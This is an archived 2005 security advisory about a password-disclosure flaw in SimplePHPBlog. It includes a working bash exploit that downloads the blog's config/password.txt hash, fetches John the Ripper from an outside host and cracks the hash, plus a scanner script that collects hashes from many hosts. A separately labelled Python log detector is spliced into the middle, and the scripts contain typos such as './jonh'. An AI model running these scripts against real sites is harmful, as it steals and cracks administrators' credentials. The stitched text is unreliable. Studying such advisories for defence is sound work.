SimplePHPBlog 0.4.0 <= Remote Password Disclosure

2005-07-08T00:00:00
ID SECURITYVULNS:DOC:9101
Type securityvulns
Reporter Securityvulns
Modified 2005-07-08T00:00:00

Description


Security Advisory 2005-0x00

Authors......... pjphem && LazyCrs
Date............ 07/07/2005
Vendor.......... www.simplephpblog.com
Type............ SimplePHPBlog 0.4.0 <= Remote Password Disclosure

o The Problem:

bash-3.00# cat install02.php

$result = create_folder( 'config' );

bash-3.00# cat sb_login.php

    // If there's no password file then need to redirect them.
    $passFile = 'config/password.txt';

    ----------------------------------------------------------------------------------------

    function create_password ( $user, $pass ) {
        // Generate and store password hash

        $mypasswd = $user.$pass;
        $hashed = crypt($mypasswd);

        // Save File
        $filename = 'config/password.txt';
        $result = sb_write_file( $filename, $hashed );

    ----------------------------------------------------------------------------------------

    function check_password ( $user, $pass ) {
        // Check password against hashed password file

        $passFile = 'config/password.txt';
        $hashed = sb_read_file( $passFile );

bash-3.00# ls -l `pwd` | grep config
drwxrwxrwx 2 www-data www-data 216 Jul 7 01:13 config
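The file the advisory points at, config/password.txt, sits inside the web root, so any request for it shows up in the web server's access log. The following detector, an added example that is not part of the advisory, scans combined-format access log lines for that path and separates successful downloads (status 200, the hash has left the server) from denied or failed probes. The log layout regex and the sample lines are constructed assumptions.

```python
import re

# Apache/nginx "combined" log layout (an assumption about the log format in use).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# The hash file the advisory shows being served straight out of the web root.
SENSITIVE_PATH_RE = re.compile(r'/config/password\.txt(\?.*)?$')

def parse_line(line):
    """Parse one combined-format line into a dict; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def find_password_file_requests(lines):
    """One finding per request for config/password.txt.
    'disclosed': server answered 200, so the crypt() hash was handed out.
    'probe': the file was requested but the response was not 200."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not SENSITIVE_PATH_RE.search(rec["path"]):
            continue
        severity = "disclosed" if rec["status"] == 200 else "probe"
        findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                         "status": rec["status"], "severity": severity})
    return findings

def sources_by_severity(findings):
    """Number of distinct source IPs per severity, for triage."""
    out = {}
    for f in findings:
        out.setdefault(f["severity"], set()).add(f["ip"])
    return {k: len(v) for k, v in out.items()}

# Constructed sample log lines (not real traffic); IPs are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Jul/2005:01:13:02 +0200] "GET /blog/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Jul/2005:01:13:05 +0200] "GET /blog/config/password.txt HTTP/1.1" 200 14 "-" "Wget/1.9.1"',
    '203.0.113.9 - - [07/Jul/2005:01:14:40 +0200] "GET /blog/config/password.txt HTTP/1.0" 403 223 "-" "Lynx/2.8.5"',
    '203.0.113.9 - - [07/Jul/2005:01:14:41 +0200] "GET /config/password.txt HTTP/1.0" 404 210 "-" "Lynx/2.8.5"',
]
```

A 'disclosed' finding means the stored hash should be treated as compromised and the password rotated; the lasting fix is to deny web access to the config directory (or move the file out of the web root) so that only 'probe' findings can ever occur.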

o Proof of concept:

bash-3.00$ cat 0xfuck-phpblog.sh

#!/bin/bash
#
# 0xfuck-phpblog.sh - SimplePHPBlog Remote Password Disclosure. (for dummy)
#
# 0xpjply CONFIDENTIAL - SOURCE MATERIALS
#
# This is published proprietary source code of 0xpjply
#
# (C) COPYRIGHT 0xpjply security guru group, 2005
#
# All Rights Reserved
#
# dummy exploit written by pjphem && infected on July 2005
#
# contact:
#
# pjphem && LazyCrs
#
# pjphem@mybox.it && fLazyCrs@GMail.com
#
# Greetz:
#
# You think you know? You have no idea!
#
# fluffi-
#
# RAFA FREE

echo ""
echo ""
echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
echo " =: SimplePHPBlog Remote Password Disclosure. - for dummy := "
echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
echo ""
echo " c0de by pjphem "
echo ""
echo ""
echo " vulnerabili Simple php blog 0.4.4 <= "
echo ""
echo ""
echo -n "inserisci un hostname: " ; read hostname ;
echo -n "inserisci dir: " ; read dir ;
echo ""
echo "[] praparando l'ambiente..."
mkdir 0xpjply
cd 0xpjply
echo -t3 "[] OK!"
echo "[] Cattura password..."
wget http://$hostname/$dir/config/password.txt
echo "[] OK!"
echo ""
echo ""
echo "Show password: (md5)"
echo ""
cat password.txt
echo ""
rm -rf password.txt
echo ""
echo -n "Downloading John The Ripper (password decripter) ?? [Y/n] "
read Q
if [ $Q = y ]; then
    echo "[] OK!" ; wget http://broly.xelon.it/adv/john.tar.gz
else
    exit 1;
fi
tar -zxf john.tar.gz
cd john
echo ""
echo "[] Dowloading password.."
echo ""
wget http://$hostname/$dir/config/password.txt
echo ""
echo "Done!"
echo ""
echo "STARING John for decript password.. enJoy"
./jonh password.txt
echo ""
echo ""
bash-3.00$

bash-3.00$ cat 0xfuck-phpblog-scanner.sh

#!/bin/bash
#
# Simple tester for phpblog
#
# phpblog 0.4.4 <=

echo "host , directory blog: (ex. test.it blog)"
read HOST BLOG
lynx -source http://$HOST/$BLOG/config/password.txt | grep $1$ >> 0wn4bl3
bash-3.00$
